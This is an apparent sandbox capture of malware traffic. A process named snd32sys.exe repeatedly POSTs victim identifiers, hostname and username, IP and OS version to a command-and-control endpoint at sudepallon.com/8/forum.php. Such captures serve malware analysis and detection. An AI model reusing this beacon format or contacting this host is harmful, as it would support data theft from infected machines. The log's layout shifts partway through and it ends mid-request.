Jul 8, 2021 16:32:08.301796913 CEST | 6066 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHJQSARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.3 | 49792 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:08.911281109 CEST | 6066 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:08.978708029 CEST | 6067 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQZAJARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.3 | 49793 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:09.286073923 CEST | 6068 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:09.355176926 CEST | 6068 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHNMSARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49758 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:53.896061897 CEST | 5639 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:53.964401007 CEST | 5688 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCAZXARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.3 | 49794 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:09.661709070 CEST | 6069 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:09.730118990 CEST | 6069 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTNMGARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.3 | 49795 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:10.059182882 CEST | 6070 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:10.127449989 CEST | 6070 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNTGMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.3 | 49796 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:10.434488058 CEST | 6071 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:10.502567053 CEST | 6071 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQFUJARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.3 | 49797 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:10.798916101 CEST | 6072 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:10.867554903 CEST | 6073 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTHSGARRABw==0


Session ID: 44 | Source IP: 192.168.2.3 | Source Port: 49798 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:12.563224077 CEST | kBytes transferred: 6073 | Direction: OUT | Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:12.632021904 CEST | kBytes transferred: 6074 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMMNNARRABw==0


Session ID: 45 | Source IP: 192.168.2.3 | Source Port: 49799 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:12.942617893 CEST | kBytes transferred: 6074 | Direction: OUT | Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:13.008268118 CEST | kBytes transferred: 6075 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNYBMARRABw==0


Session ID: 46 | Source IP: 192.168.2.3 | Source Port: 49800 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:13.320719004 CEST | kBytes transferred: 6076 | Direction: OUT | Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:13.388214111 CEST | kBytes transferred: 6076 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cVZAEARRABw==0


Session ID: 47 | Source IP: 192.168.2.3 | Source Port: 49801 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:13.690525055 CEST | kBytes transferred: 6077 | Direction: OUT | Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:13.764219046 CEST | kBytes transferred: 6077 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 4d 4e 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTMNGARRABw==0


Session ID: 48 | Source IP: 192.168.2.3 | Source Port: 49802 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:14.084805965 CEST | kBytes transferred: 6078 | Direction: OUT | Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:14.151746035 CEST | kBytes transferred: 6078 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNYBMARRABw==0


Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49759 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:31:54.344192028 CEST | kBytes transferred: 5702 | Direction: OUT | Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:31:54.414891005 CEST | kBytes transferred: 5703 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZNMAARRABw==0


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49760 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:31:54.742374897 CEST | kBytes transferred: 5716 | Direction: OUT | Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:31:54.810606956 CEST | kBytes transferred: 5801 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTKPGARRABw==0


                                                                                                                                                   Session ID:7
                                                                                                                                                   Source IP:192.168.2.3
                                                                                                                                                   Source Port:49761
                                                                                                                                                   Destination IP:77.222.42.67
                                                                                                                                                   Destination Port:80
                                                                                                                                                   Process:C:\Users\Public\snd32sys.exe
                                                                                                                                                   Timestamp:Jul 8, 2021 16:31:55.212100029 CEST
                                                                                                                                                   kBytes transferred:6031
                                                                                                                                                   Direction:OUT
                                                                                                                                                   POST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                   Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64) (in this ASCII view the sandbox replaces the hostname\username after "INFO=888683 @ " with the placeholder "computer\user"; the raw bytes carry the real values, and the 122-byte Content-Length matches the raw body, not this shortened rendering)
                                                                                                                                                   Timestamp:Jul 8, 2021 16:31:55.280215025 CEST
                                                                                                                                                   kBytes transferred:6031
                                                                                                                                                   Direction:IN
                                                                                                                                                   HTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                   Data Ascii: c\r\nBHSYARRABw==\r\n0\r\n\r\n (chunk size 0xc: one 12-byte chunk "BHSYARRABw==", then the zero-length terminating chunk)


                                                                                                                                                   Session ID:8
                                                                                                                                                   Source IP:192.168.2.3
                                                                                                                                                   Source Port:49762
                                                                                                                                                   Destination IP:77.222.42.67
                                                                                                                                                   Destination Port:80
                                                                                                                                                   Process:C:\Users\Public\snd32sys.exe
                                                                                                                                                   Timestamp:Jul 8, 2021 16:31:55.649635077 CEST
                                                                                                                                                   kBytes transferred:6032
                                                                                                                                                   Direction:OUT
                                                                                                                                                   POST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                   Timestamp:Jul 8, 2021 16:31:55.718817949 CEST
                                                                                                                                                   kBytes transferred:6032
                                                                                                                                                   Direction:IN
                                                                                                                                                   HTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                   Data Ascii: c\r\nHGTSARRABw==\r\n0\r\n\r\n (chunk size 0xc: one 12-byte chunk "HGTSARRABw==", then the zero-length terminating chunk)


                                                                                                                                                   Session ID:9
                                                                                                                                                   Source IP:192.168.2.3
                                                                                                                                                   Source Port:49763
                                                                                                                                                   Destination IP:77.222.42.67
                                                                                                                                                   Destination Port:80
                                                                                                                                                   Process:C:\Users\Public\snd32sys.exe
                                                                                                                                                   Timestamp:Jul 8, 2021 16:31:56.101624966 CEST
                                                                                                                                                   kBytes transferred:6033
                                                                                                                                                   Direction:OUT
                                                                                                                                                   POST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
